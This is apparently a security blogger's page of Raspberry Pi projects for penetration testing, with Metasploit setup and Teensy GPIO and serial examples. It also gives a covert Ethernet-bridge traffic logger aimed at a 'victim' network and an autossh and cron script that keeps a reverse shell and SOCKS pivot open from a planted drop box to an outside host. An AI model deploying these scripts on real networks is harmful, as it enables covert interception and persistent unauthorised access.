A Logo

Feel free to include my content in your page via my
RSS feed

Help Irongeek.com pay for
bandwidth and research equipment:

Search Irongeek.com:

Affiliates:
ISDPodcast Button
RootSecure Button
Social-engineer-training Button
Irongeek Button

Web Hosting:
Dreamhost Logo
Help Irongeek.com pay for bandwidth and research equipment:

paypalpixle


 Raspberry Pi Recipes

Raspberry Pi Recipes



        I have a lot of little ideas of what to do with the Raspberry Pi, but many of them would make for very short articles amounting to a few pics and some lines of code. This page will be a place for me to collect these small notes into “Raspberry Pi Recipes” and to link to any larger Raspberry Pi articles I do.


Quick Links:

I2P on the Raspberry Pi
Installing Metasploit on the Raspberry Pi
Making an “EtherLogger” to log Ethernet packets with the Raspberry Pi
Basic Output via Raspberry Pi's GPIO and Serial/UART to an Arduinio/Teensy
SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

 

I2P on the Raspberry Pi

        Hey, I love darknets.

Full article here:
http://www.irongeek.com/i.php?page=security/raspberry-pi-i2p-svartkast



Installing Metasploit on the Raspberry Pi

        This recipe will show you how to get a basic install of Metasploit on the Raspberry Pi. If you want more, skip to the bottom of this recipe. I’m using the Debian “wheezy” public beta (2012-06-18-wheezy-beta http://www.raspberrypi.org/archives/1435) but other distros may work as well. First we need to get root privileges, download the framework, ruby, subversion and libpcap. Depending on the modules you use you may need more. Then we can run msfconsole, though it will take awhile to load and if you are running another memory intensive app on your Raspberry Pi you may receive errors:

 

sudo -i
wget http://downloads.metasploit.com/data/releases/framework-latest.tar.bz2
apt-get update; apt-get dist-upgrade
apt-get install ruby subversion libpcap
tar jxpf framework-latest.tar.bz2
cd msf3
./msfconsole


        Really, the above is about all you need to do. If you want more, you may want to look at PwnPi (http://www.pwnpi.com/) which includes Metasploit, dnstracer, lynis, netmask, tcptraceroute, tcpdump, ngrep, sslsniff, dnswalk, dmitry, ike-scan, darkstat, swaks, arping, tcpflow, bing-ip2hosts-0.2, metagoofil-blackhat, theHarvester, ExploitDB, S.E.T, Fasttrack, airodump-ng, aircrack-ng, airdecloak-ng, packetforge-ng, wash, airdecap-ng, ivstools, makeivs-ng, airbase-ng, aireplay-ng, airserv-ng, airdriver-ng, airmon-ng, airtun-ng, btscanner, obexftp, reaver, kismet, prismstumbler, wavemon, weplab, fping, hping3, nbtscan, netdiscover, nmap, onesixtyone, p0f, sslscan, tcptraceroute, xprobe, zenmap, pbnj, bkhive (not sure why), chntpw (really not sure why), dsniff, etherape, ettercap, john (dudes, if the Raspberry Pi is the fastest thing you have to crack passwords on, there is a problem), medusa, netsed, ophcrack (same comment as with john), packeth, packit, samdump2 (again, not sure why), ssldump, tcpick, tcpreplay, wireshark, yersinia, fcrackzip, sipcrack, sipsak, curl, flasm, ratproxy, smbclient, sqlmap, w3af, wapiti, wbox, nikto, skipfish,  6tunnel, cryptcat, dns2tcpt, proxychains, ptunnel, socat, stunnel4, tinyproxy, udptunnel, vidalia, netcat, openvpn, iodine, httptunnel,  aimage, chkrootkit, foremost, galleta, magicrescue, mboxgrep, scalpel, scrub, vinetto, wipe (ok, most of the forensic tools I doubt you would want to use much on the Raspberry Pi), Dissy, siege, Pentbox-1.5, ipcalc, sendemail, and macchanger. Yeah, I copied and pasted that from their site, with a little bit of commentary. Some tools I’m not sure are that useful for a Raspberry Pi, but hell, you have space to spare on a 8GB SD card so why not? Good job guys. We need to work on a frontend to make tunneling in easier.
 



Making an “EtherLogger” to log Ethernet packets with the Raspberry Pi

        You guys know I love hardware keyloggers (which reminds me, at $35 for the Raspberry Pi and $16 for a Teensy I should work on a network enabled hardware keylogger), but why not an ethernet logger? The idea is simple, use the built-in Ethernet of the Raspberry Pi, add another USB Ethernet adapter, set up bridging and log everything with TCPDump! Or for that matter, you can use TCPDump’s capture filters to just grab what you want and pass on the rest (someone mentioned to me that making a Wall of Sheep/Wall of Social Science Majors would be a cool idea). I’d highly recommend finding a case to put your Raspberry Pi in for this project, this laying naked on the floor on in a wiring closet will stand out. Also, it will likely drop throughput quite a bit, especially if you are trying to work at gigabit speeds (We are talking a USB 2 Ethenet dongle after all). My script needs more testing, if the Raspberry Pi fails, the victim’s connection will go down.

        First up, we need to install bridge-utils so we can set up a man in the middle Ethernet bridge, then use an editor to write a script to set up bridging and logging:

 

sudo apt-get install bridge-utils tcpdump
ifconfig
cd /
nano startbridgeandlog.sh

        Below is the startbridgeandlog.sh script I am using. The core thing you need to change is the IP you will be remoting in on to get the pcap files, but if you just plan to come and pick-up the device by hand then you may not need to change anything (I’d try setting it to 0.0.0.0 then). You will also want to look at the MAN page for TCPDump to understand the options I’m using. With the options I have set below, it will write the packets to mycap.pcap0 till it reaches 1 billion bytes (base 10, so not really 1GB) then moves on to the files mycap.pcap1, and then mycap.pcap2. When mycap.pcap2 is 1 billion bytes, it moves back and overwrites mycap.pcap0. Adjust your setting according to how much data you want to log and how big your SD card is.

 

#!/bin/bash
#Change settings below to match network
eth_ip="192.168.1.199"
eth_netmask="255.255.255.0"
eth_broadcast="192.168.1.255"

brctl addbr mybridge
brctl addif mybridge eth0
brctl addif mybridge eth1
ifconfig eth0 0.0.0.0 promisc up
ifconfig eth1 0.0.0.0 promisc up
ifconfig mybridge promisc up
ifconfig mybridge $eth_ip netmask $eth_netmask broadcast $eth_broadcast
tcpdump -i eth1 -s 0 -C 1000 -W 3 -w /mycap.pcap

        After our bridge script is written, we need to set it up to execute automatically on system boot. We do this by setting the execute bit, and then editing our rc.local file:

 

chmod +x startbridgeandlog.sh
nano /etc/rc.local


        For my edits I just added:
 
/startbridgeandlog.sh


        above the “exit 0” in the in the rc.local. Please note that my script, and pcap files, are in the root of the file system. You may have to ssh in and run:
 
chmod +r mycap.pcap0


If you wish to be able to SFTP the files out using the “pi” user account. Thanks to the following site for giving me some of the script ideas:

http://openvpn.net/index.php/open-source/documentation/miscellaneous/76-ethernet-bridging.html#linuxscript

and you may want to watch this video of mine:
http://www.irongeek.com/i.php?page=videos/ethernet-bridge-ubuntu-linux

 

 

Basic Output via Raspberry Pi's GPIO and Serial/UART to an Arduinio/Teensy

        This recipe will be very basic. Just some simple IO (more accurately, just O) using the General Purpose Input/Output (GPIO) ports on the Raspberry Pi. For more info, and pin-outs, you should see:

http://elinux.org/RPi_Low-level_peripherals
and
http://www.pjrc.com/teensy/pinout.html

Blinky!

        This is the hello world of electronics. All it consists of is an LED and some jumper wires. I recommend getting a bunch of male and female jumpers. The circuit is simple, though I should probably have added a current limiting resistor.

The code is also simple, you could just type this all into a command line after SSHing into your Raspberry Pi, or you could make a script. All this does is turn the LED on and off at 1 second intervals.

sudo -i
echo "4" > /sys/class/gpio/export
echo "out" > /sys/class/gpio/gpio4/direction
while true;
do
echo "1" > /sys/class/gpio/gpio4/value;
sleep 1;
echo "0" > /sys/class/gpio/gpio4/value;
sleep 1;
done

Here is a quick video of the results.

 

Output via GPIO

        The blinky example is ok, but the GPIO pins on the Raspberry Pi work at 3.3 volts, what if we want to interface with something that is working at 5v? For example, lets say you want to hook it up to an Arduino or a Teensy. The simplest solution might be to buy some logic level converters:

            http://www.sparkfun.com/products/8745

at about $2 per pop, these are small and easy to use. You get 4 IO lines, or two serial connections, depending on how you use them. I wired mine to a Teensy as follows: 

 

        This is the code I loaded on the Teensy:

void setup(){
 pinMode(0, INPUT);
}

void loop(){
 
if (digitalRead(0))
 
{
  
Keyboard.println("high");
   delay
(1000);
 
}else{
  }
 
}

        All it does is watch to see if the line goes to 5v. If it does, it print "high" using the Teensy's option to act as a USB HID keyboard. I turn the Raspberry Pi's GPIO 4 on and off by setting it for output using:

echo "4" > /sys/class/gpio/export
echo "out" > /sys/class/gpio/gpio4/direction

as root, then just turn it on with:

echo "1" > /sys/class/gpio/gpio4/value;

or off with:

echo "0" > /sys/class/gpio/gpio4/value;

        Here is a video of the results (with some really crappy camera phone work):

 

 

UART/Serial Output from the Raspberry Pi

        We can also use the logic level converters to work with UART/Serial and interface with a Teensy or Arduino. Here is a simple diagram/schematic of the hook up. Keep in mind that TX from the Teensy goes to the RX on the Raspberry Pi and vice versa.

        The code is also simple, I based it on some Paul had up on the Teensy website. All it does is print whatever comes in over the UART interface (notice I'm using 115200 bps as the connection speed).

// This line defines a "Uart" object to access the serial port
HardwareSerial Uart = HardwareSerial();

void setup() {
 Uart.begin(115200);
}

void loop() {
 
char incomingByte;
 
if (Uart.available() > 0)
 
{
 
incomingByte = Uart.read();
 
Keyboard.print(incomingByte);
 
}
}

        Now I can cat or echo things out to /dev/ttyAMA0, and the Teensy should print them out as seen in this video (again, crappy camera work):

 

        These are just simple examples of using a Raspberry Pi to output to an Arduino or Teensy. The Raspberry Pi is cheaper than many Ethernet Shields for the Arduino, and a lot more powerful/flexible in it's own right. I plan to work later on bidirectional serial interfacing with the Raspberry Pi.

 

 

SSH Phone Home: Using the Raspberry Pi as a proxy/pivot (Shovel a Shell)

        In  this section I'll cover setting up a Raspberry Pi to send you a Reverse Shell using SSH (AKA: Shovel a shell). This is pretty good for blowing past NAT and some firewalls with weak egress filtering. The idea is that you can use these as drop boxes to leave behind on someone else's network, then have them remote back out to you. These instructions should work pretty much the same on any *nix device or distro that uses OpenSSH. Make sure you have OpenSSH installed, but most distros I've seen do.

  • These are the non-automated commands to do a reverse SSH connection and set up a Proxy/Pivot using OpenSSH:
    On Raspberry Pi use the following command :

        ssh -R 1974:localhost:22 root@some-pc-client

  • On PC (must have SSH server on box):

        ssh -D 1080 -p 1974 pi@localhost

The above command also opens up a SOCKS port on you local PC host that you can use to tunnel traffic into the Raspberry Pis's network with.

Automating it

    Ok, the commands above were just to do it manually, how about automating the shell shoveling? I based my work on Brandon Hutchinson’s script for automating the SSH reverse connection every 5 min, so check out his site.:
http://www.brandonhutchinson.com/Passwordless_ssh_logins.html
http://www.brandonhutchinson.com/ssh_tunnelling.html

Here are the steps:
1. SSH Keys Setup
Do the following on the Raspberry Pi, but replace “root” with the username on your home PC (I use home.irongeek.com in these examples)

        ssh-keygen -t rsa

Use a blank passphrase. This next line is to copy of the key to the PC

        cat ~/.ssh/id_rsa.pub | ssh root@home.irongeek.com "cat - >> ~/.ssh/authorized_keys"

2. Reverse SSH Automatic Script
Make a script called “autossh” on the Raspberry Pi with the contents of this script, replacing the parameters in green as needed:

 

#!/bin/sh

# Based on http://www.brandonhutchinson.com/ssh_tunnelling.html

# $REMOTE_HOST is the name of the remote system

REMOTE_HOST=home.irongeek.com

 

# Setting my username for home box, you will most likely want to change this

USER_NAME=root

 

# $REMOTE_PORT is the remote port number that will be used to tunnel

# back to this system

REMOTE_PORT=1974

 

# $COMMAND is the command used to create the reverse ssh tunnel

COMMAND="ssh -q -N -R $REMOTE_PORT:localhost:22 $USER_NAME@$REMOTE_HOST"

 

# Is the tunnel up? Perform two tests:

 

# 1. Check for relevant process ($COMMAND)

pgrep -f -x "$COMMAND" > /dev/null 2>&1 || $COMMAND

 

# 2. Test tunnel by looking at "netstat" output on $REMOTE_HOST

ssh $REMOTE_HOST netstat -an | egrep "tcp.*:$REMOTE_PORT.*LISTEN" \

   > /dev/null 2>&1

if [ $? -ne 0 ] ; then

   pkill -f -x "$COMMAND"

   $COMMAND

fi

 and set it as executable with:

                    chmod 755 autossh

3. Use the “crontab –e” command on your Raspberry Pi to schedule the script to run every 5 min. The entry will be something like:

        */5 * * * * /home/pi/autossh
        SSH Automatic Script


4. Now go to you home PC and you should be able to use this command to connect to the waiting shell:

        ssh –D 1080 -p 1974 pi@localhost

Use port 1080 on the localhost for tools that will work with a SOCKS proxy and tunnel traffic into the remote network.

Printable version of this article

15 most recent posts on Irongeek.com:


If you would like to republish one of the articles from this site on your webpage or print journal please contact IronGeek.

Copyright 2014, IronGeek
Louisville / Kentuckiana Information Security Enthusiast